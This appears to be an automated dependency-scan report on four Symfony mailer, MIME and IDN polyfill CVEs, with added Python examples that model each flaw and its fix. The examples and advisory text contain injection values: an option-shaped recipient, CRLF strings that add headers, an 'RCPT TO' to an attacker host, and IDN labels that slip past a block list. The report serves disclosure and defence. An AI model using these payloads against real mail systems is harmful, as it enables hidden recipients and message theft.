Vulnerable Library - symfony/mailer-v8.0.0
Helps sending emails
Library home page: https://api.github.com/repos/symfony/mailer/zipball/f9b546f0e28cbd08fd5d03f2472aad913a9398f9
Vulnerabilities
*For some transitive vulnerabilities, there is no version of direct dependency with a fix. Check the "Details" section below to see if there is a version of transitive dependency where vulnerability is fixed.
**In some cases, Remediation PR cannot be created automatically for a vulnerability despite the availability of remediation
Details
CVE-2026-45068
Vulnerable Library - symfony/mailer-v8.0.0
Helps sending emails
Library home page: https://api.github.com/repos/symfony/mailer/zipball/f9b546f0e28cbd08fd5d03f2472aad913a9398f9
Dependency Hierarchy:
- ❌ symfony/mailer-v8.0.0 (Vulnerable Library)
Found in base branch: develop
Vulnerability Details
Description: Symfony Mailer selects a transport via the "MAILER_DSN" environment variable / configuration (e.g. "smtp://...", "sendmail://...", "native://default"). "SendmailTransport" invokes the local "sendmail" binary and supports two modes: "-bs" (speak SMTP over stdin; the default) and "-t" (read the message on stdin and pass the recipients as command-line arguments). In "-t" mode, recipient addresses are appended to the sendmail command line without a "--" end-of-options separator. A recipient address beginning with "-" (which "Symfony\Component\Mime\Address" accepts as valid, because a leading "-" is legal in an address) is therefore interpreted by sendmail as a command-line option rather than as an address. Only deployments that run the transport in "-t" mode are exposed: in the default "-bs" mode the recipients travel inside the SMTP dialogue on stdin, not on the command line.
Resolution: "SendmailTransport" now inserts "--" before the list of recipients, so that everything after it is parsed as an operand. The patch is available at symfony/symfony@c451448 (branch 5.4).
Credits: Symfony would like to thank Claude Mythos Preview (via Project Glasswing) for reporting the issue and providing the fix.
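The following Python model of the bug class is an added example; it is not part of the advisory and not Symfony's code. It builds the pre-fix and post-fix argv shapes and classifies each argument the way a POSIX getopt-style parser would, which is exactly why the "--" separator matters. The sendmail path, the "-t -i" flag layout and the sample recipients are assumptions; "-ops@example.com" is not a real sendmail option, just an address shaped like one. The last function is a defence-in-depth policy check for callers that cannot guarantee the transport passes "--" (it is stricter than RFC 5322, which does allow a leading "-").

```python
"""Argument-injection check for sendmail-style transports (added example).

Mirrors the bug class in CVE-2026-45068: in `-t` mode recipient addresses are
appended to the sendmail argv. Without a `--` end-of-options separator, a
recipient whose address starts with '-' is consumed by sendmail's option
parser instead of being treated as an address. Not Symfony code; the argv
layout (`-t -i`) and the sample recipients are assumptions.
"""
from __future__ import annotations

SENDMAIL = "/usr/sbin/sendmail"  # assumed path; nothing is executed here


def sendmail_argv_vulnerable(recipients: list) -> list:
    """Pre-fix shape: recipients appended directly after the mode flags."""
    return [SENDMAIL, "-t", "-i", *recipients]


def sendmail_argv_fixed(recipients: list) -> list:
    """Post-fix shape: '--' tells the option parser that only operands follow."""
    return [SENDMAIL, "-t", "-i", "--", *recipients]


def getopt_split(argv: list) -> tuple:
    """Model how a POSIX getopt-style parser reads argv[1:].

    Every argument that starts with '-' is an option until a bare '--' is
    seen; everything after '--' is an operand even if it starts with '-'.
    Returns (options, operands).
    """
    options = []
    operands = []
    seen_dashdash = False
    for arg in argv[1:]:
        if not seen_dashdash and arg == "--":
            seen_dashdash = True
        elif not seen_dashdash and arg.startswith("-") and arg != "-":
            options.append(arg)
        else:
            operands.append(arg)
    return options, operands


def option_like_recipients(recipients: list) -> list:
    """Defence in depth: addresses that would read as options if the transport
    did not pass '--'. RFC 5322 allows a leading '-' in the local part, so
    rejecting these is a policy decision, not an RFC validity check."""
    return [r for r in recipients if r.startswith("-")]


if __name__ == "__main__":
    # Constructed sample: one normal recipient and one option-shaped address.
    rcpts = ["alice@example.com", "-ops@example.com"]
    print(getopt_split(sendmail_argv_vulnerable(rcpts)))
    print(getopt_split(sendmail_argv_fixed(rcpts)))
    print(option_like_recipients(rcpts))
```

With the vulnerable argv, "-ops@example.com" lands in the option list next to "-t" and "-i"; with the fixed argv it is an operand. If you wrap sendmail yourself (for example in a queue worker that shells out), the same two-line fix applies: put "--" before any caller-controlled argument.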
Publish Date: 2026-05-31
URL: CVE-2026-45068
CVSS 3 Score Details (8.1)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: Low
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: None
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Release Date: 2026-05-27
Fix Resolution: https://github.com/symfony/symfony.git - v8.0.11, v7.4.11, v6.4.39, v5.4.52
Step up your Open Source Security Game with Mend here
CVE-2026-45070
Vulnerable Library - symfony/mime-v8.0.0
Allows manipulating MIME messages
Library home page: https://api.github.com/repos/symfony/mime/zipball/7576ce3b2b4d3a2a7fe7020a07a392065d6ffd40
Dependency Hierarchy:
- symfony/mailer-v8.0.0 (Root Library)
- ❌ symfony/mime-v8.0.0 (Vulnerable Library)
Found in base branch: develop
Vulnerability Details
Description: "Symfony\Component\Mime\Header\ParameterizedHeader" (and the related parameter handling reachable from "Symfony\Component\Mime\Header\Headers") serializes structured headers such as "Content-Type" and "Content-Disposition", which carry "key=value" parameters (e.g. "Content-Disposition: attachment; filename="x""). RFC 2045 / RFC 5322 require parameter names to be "tokens": a restricted ASCII subset that excludes whitespace, control characters (including CR and LF) and the "tspecials" set. Symfony's parameter handling validates and properly encodes parameter values but does not validate parameter names: the supplied name is emitted verbatim into the serialized header. A caller that derives a parameter name from untrusted input (e.g. an application that lets a user influence a "Content-Disposition" parameter name) can include "\r\n" or other non-token bytes in the name, terminating the current header and injecting additional headers into the rendered message. This is the classic CRLF / header-injection primitive applied to the parameter-name slot. The parameter-value path is not affected; the exposure exists only where application code passes attacker-influenced strings as parameter names.
Resolution: "ParameterizedHeader" now rejects parameter names containing bytes outside the RFC "token" character class. The patch is available at symfony/symfony@e62ea21 (branch 5.4).
Credits: Symfony would like to thank Fabian Fleischer for reporting the issue and Alexandre Daubois for fixing it.
Publish Date: 2026-05-31
URL: CVE-2026-45070
CVSS 3 Score Details (6.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: Low
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: High
- Availability Impact: None
Suggested Fix
Type: Upgrade version
Release Date: 2026-05-27
Fix Resolution: https://github.com/symfony/symfony.git - v8.0.10, v7.4.10, v6.4.38, v5.4.52
CVE-2026-45067
Vulnerable Library - symfony/mime-v8.0.0
Allows manipulating MIME messages
Library home page: https://api.github.com/repos/symfony/mime/zipball/7576ce3b2b4d3a2a7fe7020a07a392065d6ffd40
Dependency Hierarchy:
- symfony/mailer-v8.0.0 (Root Library)
- ❌ symfony/mime-v8.0.0 (Vulnerable Library)
Found in base branch: develop
Vulnerability Details
Description: "Symfony\Component\Mime\Address" is the value object every Symfony Mailer address (to/cc/bcc/from/reply-to) flows through; its constructor is documented as validating the address and throwing on invalid input, so developers treat it as a security boundary. The constructor accepts email addresses whose local part (the part before "@") is an RFC 5322 quoted string containing raw "\r\n" bytes, e.g. ""x\r\nBcc: attacker@evil"@example.com". The stored address is later emitted verbatim into (1) the rendered message headers and (2) "SmtpTransport"'s "MAIL FROM:<...>" / "RCPT TO:<...>" protocol lines, turning the embedded CRLF into a new mail header and/or a new SMTP command. Any application that builds an "Address" from user-supplied input (a contact form's reply-to field, a self-service recipient list) and relied on the constructor to reject such values is affected.
Resolution: The "Address" constructor now rejects addresses containing line breaks. The patch is available at symfony/symfony@dc2dbd2 (branch 5.4).
Credits: Symfony would like to thank Claude Mythos Preview (via Project Glasswing) for reporting the issue and providing the fix.
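The following Python block is an added example covering both CRLF-injection findings in this report, CVE-2026-45070 (parameter names that are not RFC 2045 tokens) and CVE-2026-45067 (line breaks inside a quoted local part). It is not Symfony's code: it reimplements the two checks the advisories describe, renders the affected output (a parameterized header and the SMTP envelope lines) in pre-fix form, and splits that output the way a receiving parser would so the injected field or command is visible. All header names, addresses and payloads are constructed for the demonstration.

```python
"""CRLF-injection checks for MIME headers and SMTP envelopes (added example).

Two slots where an unvalidated string becomes a line break in the output:
a Content-Type / Content-Disposition parameter name (CVE-2026-45070) and the
quoted local part of an address (CVE-2026-45067). Plain-Python
reimplementation of the checks the advisories describe; not Symfony code.
Sample inputs are constructed.
"""
import re

# RFC 2045 section 5.1: token = 1*<any CHAR except SPACE, CTLs, or tspecials>
TSPECIALS = set('()<>@,;:\\"/[]?=')


def is_rfc2045_token(name: str) -> bool:
    """True if every char is printable ASCII (0x21-0x7E) and not a tspecial."""
    return bool(name) and all(
        33 <= ord(ch) <= 126 and ch not in TSPECIALS for ch in name
    )


def _quote_value(value: str) -> str:
    """RFC 2045 quoted-string for a value: escape '\\' and '"', refuse CR/LF."""
    if "\r" in value or "\n" in value:
        raise ValueError("line break in parameter value")
    return '"' + value.replace("\\", "\\\\").replace('"', '\\"') + '"'


def render_parameterized(field: str, body: str, params: dict,
                         validate_names: bool) -> str:
    """Serialise e.g. Content-Disposition: attachment; filename="x"

    validate_names=False is the pre-fix behaviour (name emitted verbatim);
    validate_names=True is the fixed behaviour (name must be a token).
    """
    parts = [body]
    for name, value in params.items():
        if validate_names and not is_rfc2045_token(name):
            raise ValueError(f"invalid parameter name {name!r}")
        parts.append(f"{name}={_quote_value(value)}")
    return f"{field}: " + "; ".join(parts) + "\r\n"


def header_fields(raw: str) -> list:
    """What a receiving parser sees: one field per CRLF-terminated line, with
    folded continuation lines (leading SP/HTAB) re-joined to the previous one."""
    fields = []
    for line in raw.split("\r\n"):
        if not line:
            continue
        if line[0] in " \t" and fields:
            fields[-1] += line
        else:
            fields.append(line)
    return fields


_LINE_BREAK = re.compile(r"[\r\n]")


def validate_address(address: str) -> str:
    """The fixed Address check: reject any line break, including one inside an
    RFC 5322 quoted local part, before the value is stored anywhere."""
    if _LINE_BREAK.search(address):
        raise ValueError("address contains a line break")
    if "@" not in address:
        raise ValueError("address has no @")
    return address


def smtp_envelope(sender: str, recipients: list) -> str:
    """Pre-fix rendering: the stored address goes verbatim into the protocol line."""
    lines = [f"MAIL FROM:<{sender}>"] + [f"RCPT TO:<{r}>" for r in recipients]
    return "\r\n".join(lines) + "\r\n"


def smtp_commands(raw: str) -> list:
    """Split a client stream into commands the way an SMTP server does."""
    return [line for line in raw.split("\r\n") if line]


def rejects(fn, *args) -> bool:
    """True if fn(*args) raises ValueError (shows that the fixed checks fire)."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed payloads: a parameter name and a quoted local part, both
    # carrying CRLF.
    bad_name = {"filename\r\nX-Injected: yes\r\nfoo": "x"}
    print(header_fields(render_parameterized("Content-Disposition", "attachment", bad_name, False)))
    print(rejects(render_parameterized, "Content-Disposition", "attachment", bad_name, True))
    addr = '"x\r\nRCPT TO:<attacker@evil.example>\r\ny"@example.com'
    print(smtp_commands(smtp_envelope("sender@example.com", [addr])))
    print(rejects(validate_address, addr))
```

Run stand-alone, the pre-fix renderer turns one Content-Disposition field into three fields, and one RCPT TO line into three SMTP commands; the fixed checks reject both inputs before anything is rendered. The same token and line-break tests are a cheap unit test to add to any code that builds headers or envelopes from user data, whatever library sits underneath.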
Publish Date: 2026-05-31
URL: CVE-2026-45067
CVSS 3 Score Details (6.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: Low
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: High
- Availability Impact: None
Suggested Fix
Type: Upgrade version
Release Date: 2026-05-27
Fix Resolution: https://github.com/symfony/symfony.git - v8.0.10, v7.4.10, v6.4.38, v5.4.52
CVE-2026-46644
Vulnerable Library - symfony/polyfill-intl-idn-v1.33.0
Symfony polyfill for intl's idn_to_ascii and idn_to_utf8 functions
Library home page: https://api.github.com/repos/symfony/polyfill-intl-idn/zipball/9614ac4d8061dc257ecc64cba1b140873dce8ad3
Dependency Hierarchy:
- symfony/mailer-v8.0.0 (Root Library)
- egulias/email-validator-4.0.4
- ❌ symfony/polyfill-intl-idn-v1.33.0 (Vulnerable Library)
Found in base branch: develop
Vulnerability Details
Description: "symfony/polyfill-intl-idn" provides a userland implementation of "idn_to_utf8()" and "idn_to_ascii()" for runtimes that lack the "intl" extension. Its "Idn::process()" method decodes labels prefixed with "xn--" using Punycode but never enforces the validity criterion added in UTS #46 revision 33, Section 4, step 4.1.2: after a successful Punycode decode, the result must contain at least one non-ASCII code point. As a consequence, "xn--" labels whose Punycode payload is empty ("xn--") or decodes to a string made only of ASCII code points (e.g. "xn--kc1zs4-") are accepted by the polyfill, while PHP's native "ext-intl" rejects them with "IDNA_ERROR_INVALID_ACE_LABEL" (the "errors=1024" in the table below is the numeric value of that constant). Originally unequal domain names are therefore regarded as equal, which can lead to block-list bypasses, inconsistent URL parsing and server-side request forgery (similar to CVE-2024-12224).
Example with "IDNA_USE_STD3_RULES | IDNA_CHECK_BIDI | IDNA_CHECK_CONTEXTJ | IDNA_NONTRANSITIONAL_TO_ASCII":
| Input | Polyfill output | Native "ext-intl" output |
| --- | --- | --- |
| "poc.xn--kc1zs4-.com" | "poc.kc1zs4.com" | "false" ("errors=1024") |
| "poc.kc1zs4.xn--" | "poc.kc1zs4." | "false" ("errors=1024") |
Applications using the polyfill to canonicalise or compare hostnames inherit the inconsistency. Note the dependency path: the polyfill reaches symfony/mailer through egulias/email-validator, so it can be installed even where the application never calls the IDN functions itself, but the vulnerable code only runs on hosts where "ext-intl" is absent, because the polyfill defers to the native functions when they exist.
Resolution: "Idn::process()" now records "IDNA_ERROR_INVALID_ACE_LABEL" when a Punycode payload decodes to an empty string or to a string containing only ASCII code points, matching the native "ext-intl" behaviour and UTS #46 revision 33. The patch is available at symfony/polyfill@1be936e (branch 1.x).
Credits: Symfony would like to thank Nazy Mad for reporting the issue and Nicolas Grekas for providing the fix.
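The following Python block is an added example, not the polyfill's code: it reimplements the UTS #46 step 4.1.2 check with the standard library's Punycode codec and reproduces both columns of the table above (the lenient mode models the pre-fix polyfill, the strict mode the native "ext-intl" result). The error constants are copied from PHP's ext-intl values; the "xn--mnchen-3ya" label is a standard valid A-label used as the control case, and the hostname-comparison helper illustrates the block-list bypass the advisory describes.

```python
"""UTS #46 step 4.1.2 check for 'xn--' labels (added example).

Reimplements, in plain Python, the validity criterion the polyfill missed in
CVE-2026-46644: a Punycode payload must decode to a non-empty string that
contains at least one non-ASCII code point; otherwise the label is an invalid
ACE label. `lenient` models the pre-fix polyfill, `strict` adds the check.
Only the stdlib Punycode codec is used; this is not the polyfill's code. The
error constants carry the numeric values of PHP's ext-intl constants.
"""
from __future__ import annotations

IDNA_ERROR_PUNYCODE = 256            # PHP: IDNA_ERROR_PUNYCODE
IDNA_ERROR_INVALID_ACE_LABEL = 1024  # PHP: IDNA_ERROR_INVALID_ACE_LABEL


def decode_label(label: str, strict: bool) -> tuple:
    """Return (decoded_label, error_bits) for one domain label."""
    if not label.lower().startswith("xn--"):
        return label, 0
    payload = label[4:]
    try:
        decoded = payload.encode("ascii").decode("punycode")
    except (UnicodeError, ValueError):
        return label, IDNA_ERROR_PUNYCODE
    if strict and (decoded == "" or decoded.isascii()):
        # UTS #46 section 4, step 4.1.2: a decode that yields no non-ASCII
        # code point is a disguised ASCII label, not a legitimate A-label.
        return label, IDNA_ERROR_INVALID_ACE_LABEL
    return decoded, 0


def to_unicode(domain: str, strict: bool) -> tuple:
    """Convert a whole domain; returns (result or None, OR-ed error bits).

    strict=False reproduces the polyfill's pre-fix output (the "Polyfill
    output" column); strict=True reproduces what the advisory reports for
    native ext-intl: no result, errors=1024.
    """
    labels = []
    errors = 0
    for label in domain.split("."):
        decoded, err = decode_label(label, strict)
        labels.append(decoded)
        errors |= err
    return (None if errors else ".".join(labels)), errors


def lenient_to_unicode(domain: str):
    return to_unicode(domain, strict=False)[0]


def strict_to_unicode(domain: str) -> tuple:
    return to_unicode(domain, strict=True)


def same_host_lenient(a: str, b: str) -> bool:
    """The bypass: two byte-wise different hostnames compare equal after the
    lenient canonicalisation, so a block-list entry for one matches the other
    (or fails to match it, depending on which side was normalised)."""
    return lenient_to_unicode(a) == lenient_to_unicode(b)


if __name__ == "__main__":
    for host in ("poc.xn--kc1zs4-.com", "poc.kc1zs4.xn--", "xn--mnchen-3ya.example"):
        print(host, "->", lenient_to_unicode(host), strict_to_unicode(host))
    print(same_host_lenient("poc.xn--kc1zs4-.com", "poc.kc1zs4.com"))
```

If you cannot upgrade immediately, the strict branch here is the behaviour to assert in your own tests: any "xn--" label whose payload decodes to pure ASCII must be refused, and hostname comparisons for security decisions should be made on the canonical form produced by a checker that enforces it.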
Publish Date: 2026-05-31
URL: CVE-2026-46644
CVSS 3 Score Details (5.8)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Changed
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: Low
- Availability Impact: None
Suggested Fix
Type: Upgrade version
Origin: GHSA-2xf4-cg6j-vhgq
Release Date: 2026-05-28
Fix Resolution: symfony/polyfill-intl-idn - v1.38.1,symfony/polyfill - v1.38.1